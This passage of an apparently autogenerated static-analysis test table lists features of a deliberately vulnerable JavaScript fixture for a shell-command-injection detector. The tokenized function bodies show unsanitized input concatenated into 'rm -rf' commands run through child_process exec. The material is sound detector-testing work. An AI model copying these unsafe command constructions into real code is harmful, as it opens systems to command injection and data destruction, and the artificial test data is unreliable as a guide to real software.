"-rf" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:21:93:25 | "-rf" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:21:93:25 | "-rf" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:21:93:25 | "-rf" | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:21:93:25 | "-rf" | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:21:93:25 | "-rf" | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:21:93:25 | "-rf" | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:21:93:25 | "-rf" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:21:93:25 | "-rf" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:28:93:31 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:28:93:31 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:28:93:31 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:28:93:31 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:28:93:31 | name | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:28:93:31 | name | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:28:93:31 | name | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:28:93:31 | name | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:28:93:31 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:28:93:31 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:96:5:96:8 | util | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:96:5:96:8 | util | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:96:5:96:8 | util | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:96:5:96:8 | util | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:96:5:96:26 | util | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:96:5:96:26 | util | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:96:5:96:26 | util | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:96:5:96:26 | util = ... "util") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:96:5:96:26 | util = ... "util") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:96:5:96:26 | util = ... "util") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:96:12:96:18 | require | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:96:12:96:18 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:96:12:96:18 | require | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:96:12:96:26 | exceptional return of require("util") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:96:12:96:26 | exceptional return of require("util") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:96:12:96:26 | exceptional return of require("util") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:96:12:96:26 | require("util") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:96:12:96:26 | require("util") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:96:12:96:26 | require("util") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:96:20:96:25 | "util" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:96:20:96:25 | "util" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:96:20:96:25 | "util" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:96:20:96:25 | "util" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:96:20:96:25 | "util" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:96:20:96:25 | "util" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:1:97:6 | module | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:1:97:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:1:97:6 | module | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:1:97:14 | module.exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:1:97:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:1:97:14 | module.exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:1:97:21 | module. ... .format | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:1:97:21 | module. ... .format | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:1:97:21 | module. ... .format | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:1:109:1 | module. ... OT OK\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:1:109:1 | module. ... OT OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:1:109:1 | module. ... OT OK\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:8:97:14 | exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:8:97:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:8:97:14 | exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:16:97:21 | format | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:16:97:21 | format | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:16:97:21 | format | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:25:97:24 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:25:97:24 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:25:97:24 | cp | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf 